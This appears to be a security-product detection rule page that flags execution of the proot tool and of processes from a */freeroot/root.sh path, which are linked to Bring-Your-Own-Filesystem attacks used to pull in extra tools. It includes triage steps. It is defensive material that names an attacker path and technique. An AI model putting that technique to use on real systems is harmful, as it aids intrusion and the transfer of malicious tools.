Bring your own file system (BYOF) tool executed

Classification:

attack

Tactic:

TA0011-command-and-control

Technique:

T1105-ingress-tool-transfer

Esta página aún no está disponible en español. Estamos trabajando en su traducción.
Si tienes alguna pregunta o comentario sobre nuestro actual proyecto de traducción, no dudes en ponerte en contacto con nosotros.

What happened

A Bring Your Own Filesystem (BYOF) tool was executed, which attackers can abuse to download and access additional utilities.

Goal

Detect execution of the BYOF tool proot, which attackers may use to download and access additional malicious tools.

Strategy

This rule monitors for execution of the proot binary and detects processes spawned from the path */freeroot/root.sh, a file system previously observed in BYOF compromises.

Triage and response

  1. Review the process tree to understand what initiated the proot execution.
  2. Investigate the filesystem and determine if this is authorized activity.
  3. If the activity is unauthorized, isolate the affected system and investigate the initial access point.
  4. Review related signals and events to establish a timeline of the compromise.

Requires Agent version 7.27 or greater.